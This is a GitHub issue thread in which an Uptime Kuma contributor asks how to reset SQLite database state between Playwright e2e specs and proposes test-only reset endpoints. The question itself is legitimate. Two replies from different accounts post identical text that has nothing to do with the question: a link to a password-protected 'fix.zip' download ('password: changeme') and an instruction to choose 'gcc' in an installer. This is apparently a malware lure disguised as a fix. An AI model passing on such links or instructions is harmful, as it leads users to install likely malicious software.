### ISSUE TITLE
Resetting database state between e2e specs

### ISSUE THREAD

**Issue by simshaun** [louislam/uptime-kuma#5052]
### ⚠️ Please verify that this question has NOT been raised before.

- [X] I checked and didn't find similar issue

### 🛡️ Security Policy

- [X] I agree to have read this project [Security Policy](https://github.com/louislam/uptime-kuma/security/policy)

### 📝 Describe your problem

Hi,

This is a development question/issue. I'm working on my PR and running into an issue creating a separate e2e spec file from the `setup.spec.js` test.

As it stands, there's no way to reset state between each spec or test. I'm trying to remedy that, but I'm not sure what the best way to go about it. So, I'm opening this issue to discuss.

I've written functions that handle storing & restoring a freshly initialized SQLite Kuma DB; These can be called in `test.beforeAll` or `test.beforeEach` as needed. The issue I'm having is the Kuma server holds a file lock on the SQLite DB.

What would be the best way to handle this?

My ideas include:
1. Add /close-database and /open-database endpoints to the server only in the test environment that close the connection and open the connection via initDatabase. The idea is to close the connection, swap the SQLite DB out with a fresh one, then re-open the connection. Not 100% sure this would work.
2. Add a /reset-database endpoint to the server only in the test environment. Instead of calling functions from Playwright's `test.beforeAll` or `test.beforeEach` methods, call this endpoint. Let the server close the connection, drop the database, and re-initialize.
3. Restart the server before each spec. This seems like a bad idea and I'm not sure how to do it with Playwright.

Any suggestions or alternate ideas?

### 🐻 Uptime-Kuma Version

2.0-dev

### 💻 Operating System and Arch

N/A

### 🌐 Browser

N/A

### 🖥️ Deployment Environment

x

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
